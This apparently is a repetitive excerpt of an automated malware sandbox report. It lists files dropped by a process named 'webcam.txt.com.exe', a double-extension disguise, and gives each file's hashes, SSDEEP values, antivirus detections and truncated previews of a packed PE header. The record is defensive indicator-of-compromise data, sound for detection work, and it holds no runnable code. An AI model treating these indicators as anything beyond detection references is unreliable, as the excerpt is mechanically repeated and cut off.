                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
